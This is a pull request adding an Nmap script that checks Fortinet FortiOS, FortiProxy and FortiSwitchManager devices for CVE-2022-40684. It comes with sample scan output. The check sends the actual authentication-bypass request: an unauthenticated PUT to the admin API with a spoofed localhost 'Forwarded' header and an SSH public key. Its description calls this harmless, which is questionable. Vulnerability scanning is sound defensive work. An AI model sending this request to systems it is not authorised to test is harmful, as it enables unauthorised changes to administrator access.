### PR TITLE
Added cve-2022-40684.nse to scan Authentication Bypass on Fortinet Fo…

### DIFF
--- a/scripts/cve-2022-40684.nse
+++ b/scripts/cve-2022-40684.nse
@@ -1,0 +1,74 @@
+local io = require "io"
+local json = require "json"
+local http = require "http"
+local vulns = require "vulns"
+local stdnse = require "stdnse"
+local string = require "string"
+local shortport = require "shortport"
+
+
+description =
+    [[
+Check Fortinet Critical Authentication Bypass Vulnerability (CVE-2022-40684) [Exploit ]
+POC for CVE-2022-40684 affecting Fortinet FortiOS, FortiProxy, and FortiSwitchManager appliances.
+
+The script sends a specially crafted HTTP request with no impact on the system to detect this vulnerability.
+The affected versions are FortiOS versions between 7.0.0 – 7.0.6 and 7.2.0 – 7.2.1FortiProxy versions between 7.0.0 – 7.0.6 and version 7.2.0FortiSwitchManager versions 7.0.0 and 7.2.0
+]]
+
+---
+-- @usage nmap -sV --script vuln <target>
+-- @usage nmap -p80 --script cve_2022_40684.nse <target>
+---
+
+author = {"Mr_Hackux", "<hackuxe@gmail.com>", "Valentin Lobstein (Balgogan / Chocapikk)", "<balgogan@protonmail.com>"}
+license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
+categories = {"vuln", "safe"}
+
+portrule = shortport.http
+
+local VULNERABLE = "SSH key is good"
+local INVALID_KEY = "SSH key is invalid"
+local PATCHED = "Unauthorized"
+
+action = function(host, port)
+    local uri = "/api/v2/cmdb/system/admin/admin"
+    local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)
+    local vuln = {
+        title = "Fortinet Critical Authentication Bypass Vulnerability",
+        state = vulns.STATE.NOT_VULN,
+        description = [[
+Fortinet Critical Authentication Bypass Vulnerability (CVE-2022-40684)
+    ]],
+        IDS = {CVE = "CVE-2022-40684"},
+        references = {
+            "https://hackuxe.com"
+        },
+        dates = {
+            disclosure = {year = "2022", month = "22", day = "15"}
+        }
+    }
+
+    local json_key =
+        '{"ssh-public-key1": "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQC2EMTW9TNcOrkcPxCrpqdLdp1DnuKfrz4Ba5eHCyONA5yG5R6hvbyPN08/3y4UcIQN8ohcLp4KhiNcHn1Km5w1++bexptZZyOrx+xa1l2jqqZU2MzPtJxzQ17nhWD0QZdXFyZlzNzfSTatR/crH3NR5zq+1PWFvfi99XfGwxvZRukiGYBXaWsvjhoy0/ers58VHhjv1Qi1dYWHcjWA1QfySnrPNKiyD0WwJP10iUkviLilCHw2t/8XTVigluM2hvvgbicx1GSTEYejAqC6b1z5k3U/0K9kZMnqt2rwMiK1bH5r/N/f8x+KZJB3bDl5fMLJ3fm+ikz1h9kTB9fae48Y8GfNv6FKt4TDnawuHQXO2Qb5WDBlBEzgF1MUoSDkTyE4YVKuiLZx5W2oFC/FAzSOjw5l3Jq8y26HDS9SX1dt19vKqmtjJP2n0Vgcy1YCnmjAHlYI+A71nlaq8OTO5YqvuiAAiQdR5rD5fR13yg6Q7Tuw93eyxKmAexFSo6DkKXptpyQHNY4INGpmDQipQTYiWb/5pjJ2FVbn7RSeFkXyun0MfPBUImzGl2ZuuBO39NH86azzK75wyVt05GLH/pfv3A45D056+3e+layxAwYfvds5i8by7db0K3ez9q+6bomz82TJGb1Nnh1UM4yKexoDRrcG5rYkjIKdb0SZpOIIOQ=="}'
+
+    local options = {header = {}}
+    options["header"]["User-Agent"] = "Report Runner"
+    options["header"]["Forwarded"] = '"for="[127.0.0.1]:8888";by="[127.0.0.1]:8888"'
+
+    local response = http.put(host, port, uri, options, json_key)
+
+    if response.status and response.body then
+        if response.status == 500 and string.find(response.body, VULNERABLE) ~= nil then
+            vuln.state = vulns.STATE.VULN
+        end
+        if response.body and string.find(response.body, INVALID_KEY) ~= nil then
+            vuln.state = vulns.STATE.VULN
+        end
+        if response.status ~= 500 and response.body and string.find(response.body, PATCHED) ~= nil then
+            stdnse.debug2("System is patched!")
+            vuln.state = vulns.STATE.NOT_VULN
+        end
+    end
+    return vuln_report:make_output(vuln)
+end

--- a/scripts/cve-2022-40684.nse
+++ b/scripts/cve-2022-40684.nse
@@ -45,7 +45,7 @@ Fortinet Critical Authentication Bypass Vulnerability (CVE-2022-40684)
             "https://hackuxe.com"
         },
         dates = {
-            disclosure = {year = "2022", month = "22", day = "15"}
+            disclosure = {year = "2022", month = "10", day = "16"}
         }
     }
 

--- a/scripts/cve-2022-40684.nse
+++ b/scripts/cve-2022-40684.nse
@@ -42,7 +42,7 @@ Fortinet Critical Authentication Bypass Vulnerability (CVE-2022-40684)
     ]],
         IDS = {CVE = "CVE-2022-40684"},
         references = {
-            "https://hackuxe.com"
+            "https://www.horizon3.ai/fortios-fortiproxy-and-fortiswitchmanager-authentication-bypass-technical-deep-dive-cve-2022-40684/"
         },
         dates = {
             disclosure = {year = "2022", month = "10", day = "16"}


### PR DESCRIPTION
Added cve-2022-40684.nse to scan Authentication Bypass on Fortinet FortiOS, FortiProxy, and FortiSwitchManager appliances (CVE-2022-40684)


## Example : 

```plaintext
$ nmap -sT -T5 -p80,443 --script=cve-2022-40684.nse ***.**.***.***
Starting Nmap 7.80 ( https://nmap.org ) at 2022-10-16 19:33 CEST
Nmap scan report for ********************************* (***.**.***.***)
Host is up (0.30s latency).

PORT    STATE    SERVICE
80/tcp  filtered http
443/tcp open     https
| cve-2022-40684: 
|   VULNERABLE:
|   Fortinet Critical Authentication Bypass Vulnerability
|     State: VULNERABLE
|     IDs:  CVE:CVE-2022-40684
|       Fortinet Critical Authentication Bypass Vulnerability (CVE-2022-40684)
|           
|     Disclosure date: 2022-10-16
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40684
|_      https://www.horizon3.ai/fortios-fortiproxy-and-fortiswitchmanager-authentication-bypass-technical-deep-dive-cve-2022-40684/

Nmap done: 1 IP address (1 host up) scanned in 3.19 seconds



```